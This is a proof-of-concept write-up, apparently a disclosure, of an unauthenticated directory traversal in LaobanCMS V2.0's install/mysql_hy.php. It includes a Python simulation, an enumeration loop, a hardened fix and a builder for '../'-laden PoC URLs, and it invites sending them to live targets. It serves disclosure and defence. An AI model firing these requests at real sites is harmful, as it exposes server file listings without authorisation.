## PoC of Directory Traversal in LaobanCMS V2.0
### Precondition
No login to the CMS is required. Check that the file xxx.com/install/mysql_hy.php still exists (HTTP status 200); if it does, the vulnerability can be exploited. If the install directory has been removed after setup, the script is gone and the issue is not reachable.
### Details
In install/mysql_hy.php the developer uses the request parameters $riqi and $i without any filtering.
See the screenshot below (the line numbers refer to it).
In line 6, $riqi is concatenated with ../data/ and the result is assigned to $sql_path.
In line 7, $sql_path is passed to the PHP function scandir().
In PHP, scandir() lists the files and directories inside the given path and returns them as an array; by default the entries are sorted ascending, so "." and ".." come first.
In line 9, the $i used in $sqls[$i] is the value defined in line 5, which the attacker controls, and the element $sqls[$i] is assigned to $table.
In line 11, $table is echoed directly, so every request leaks one entry of the listing of an attacker-chosen directory. Since $riqi is never restricted to the intended backup folder under data/, a sequence of ../ walks out of the web root, and stepping $i from 0 upwards enumerates the whole directory.
### Construction of the PoC
The PoC sends two query parameters to install/mysql_hy.php:
riqi --> the directory to traverse into (appended to ../data/)
i --> the index into the array returned by scandir()
In the screenshot below, ../../../../../../ is used as riqi and 3 to 8 as the index i. The test server runs Ubuntu, so the directory names of the traversed parent path are returned (such as boot, dev, etc).
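The script below is an added example for both the Details and the PoC construction sections; it is not code from the LaobanCMS project or from the original PoC. Because the PHP of install/mysql_hy.php only appears in the screenshot, the script mirrors the logic described above ($sql_path = '../data/' . $riqi, $table = scandir($sql_path)[$i], echo $table) against a constructed directory tree, shows what a traversal leaks, puts a hardened variant beside it, and builds the PoC URLs. It assumes that $riqi and $i come from the query string, that scandir() uses its default ascending sort, and that legitimate backup folders under data/ are date-named directories (riqi is pinyin for "date"); the 8-digit pattern used for the allow-list is that assumption, not something the page states.

```python
#!/usr/bin/env python3
"""Added example, not code from LaobanCMS or from the original PoC.

Mirrors the logic the write-up describes for install/mysql_hy.php:
    $sql_path = '../data/' . $riqi;  $sqls = scandir($sql_path);  echo $sqls[$i];
Assumptions: $riqi/$i are query parameters, scandir() uses its default
ascending sort, and real backup folders under data/ are date-named (8 digits).
"""
import os
import re
import tempfile
from urllib.parse import urlencode

# PHP treats only canonical integer strings as numeric array keys.
CANONICAL_INT = re.compile(r"^(0|-?[1-9][0-9]*)$")


def php_scandir(path):
    """PHP scandir(): every entry including '.' and '..', sorted ascending."""
    return sorted(os.listdir(path) + [".", ".."])


def php_index(arr, key):
    """$arr[$key] on a PHP list: non-canonical or out-of-range keys are an
    undefined offset and yield null (None); no negative indexing as in Python."""
    if not CANONICAL_INT.match(str(key)):
        return None
    k = int(key)
    return arr[k] if 0 <= k < len(arr) else None


def vulnerable_table(webroot, riqi, i):
    """What mysql_hy.php echoes.  The script lives in <webroot>/install, so
    '../data/' . $riqi resolves relative to that directory."""
    sql_path = os.path.join(webroot, "install", "../data/" + riqi)
    sqls = php_scandir(sql_path)          # listing of an attacker-chosen directory
    return php_index(sqls, i)             # attacker-chosen element of it


DATE_DIR = re.compile(r"^[0-9]{8}$")      # assumed naming of backup folders


def hardened_table(webroot, riqi, i):
    """Fixed variant: allow-list the folder name, then verify the resolved path
    is still inside data/ (defence in depth), then bounds-check the index."""
    if not DATE_DIR.match(riqi):
        raise ValueError("riqi must be a date-named backup folder")
    base = os.path.realpath(os.path.join(webroot, "data"))
    sql_path = os.path.realpath(os.path.join(base, riqi))
    if os.path.commonpath([base, sql_path]) != base:
        raise ValueError("riqi escapes the data directory")
    table = php_index(php_scandir(sql_path), i)
    if table is None:
        raise IndexError("i out of range")
    return table


def poc_url(base_url, depth, i):
    """One PoC request: riqi climbs `depth` levels, i selects the entry."""
    query = urlencode({"riqi": "../" * depth, "i": i})
    return f"{base_url.rstrip('/')}/install/mysql_hy.php?{query}"


def dump_listing(webroot, riqi):
    """Enumerate the way an attacker would: step i from 0 until the script
    returns nothing.  Entries 0 and 1 are always '.' and '..'."""
    out, i = [], 0
    while (entry := vulnerable_table(webroot, riqi, i)) is not None:
        out.append(entry)
        i += 1
    return out


def build_demo_webroot():
    """Constructed sample tree (not a real install).  Returns <tmp>/www with
    www/install, www/data/20190101/users.sql, and a 'secrets' dir beside www."""
    root = tempfile.mkdtemp()
    www = os.path.join(root, "www")
    os.makedirs(os.path.join(www, "install"))
    backup = os.path.join(www, "data", "20190101")
    os.makedirs(backup)
    open(os.path.join(backup, "users.sql"), "w").close()
    os.makedirs(os.path.join(root, "secrets"))
    return www


if __name__ == "__main__":
    www = build_demo_webroot()
    print("intended use  :", dump_listing(www, "20190101"))
    print("two levels up :", dump_listing(www, "../../"))   # leaks 'secrets' beside the web root
    for i in range(3, 9):                                   # the requests from the screenshot
        print(poc_url("http://xxx.com", 6, i))
```

Run it as-is to see the leaked listing against the temporary tree; to reproduce the original finding, send the printed URLs to a target that still serves install/mysql_hy.php. The hardened variant keeps the allow-list as the primary control and the realpath check as a second line, because a date-only pattern already rules out every ../ sequence.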
